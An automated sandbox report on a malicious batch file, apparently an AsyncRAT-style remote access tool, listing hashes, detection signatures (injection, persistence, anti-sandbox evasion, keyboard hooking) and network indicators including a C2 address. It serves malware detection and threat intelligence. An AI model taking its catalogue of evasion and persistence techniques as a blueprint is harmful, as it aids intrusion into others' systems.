Windows Analysis Report
rbx-CO2.bat

Overview

General Information

Sample name: rbx-CO2.bat
Analysis ID: 1524982
MD5: d1324a085a54c035d136f7a73edec440
SHA1: 3049e422f937395d1d64e205ce5978182d3c2388
SHA256: 6a25d0ca74a29596a0c09f26acbe9f85a46d5c1c886a6860dc915d94ffbbbe5a
Tags: azure-winsecure-combatuser-smica83
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found large BAT file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.9% probability
Source: unknown HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40D894 FindFirstFileExW, 17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43D894 FindFirstFileExW, 17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36D894 FindFirstFileExW, 18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2D894 FindFirstFileExW, 37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBD894 FindFirstFileExW, 38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EED894 FindFirstFileExW, 38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ED894 FindFirstFileExW, 39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661D894 FindFirstFileExW, 39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D01661DA18

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.6:59172
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:59172 -> 154.216.20.132:6969
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 147.135.36.89 147.135.36.89
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipwho.is
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.49.dr String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
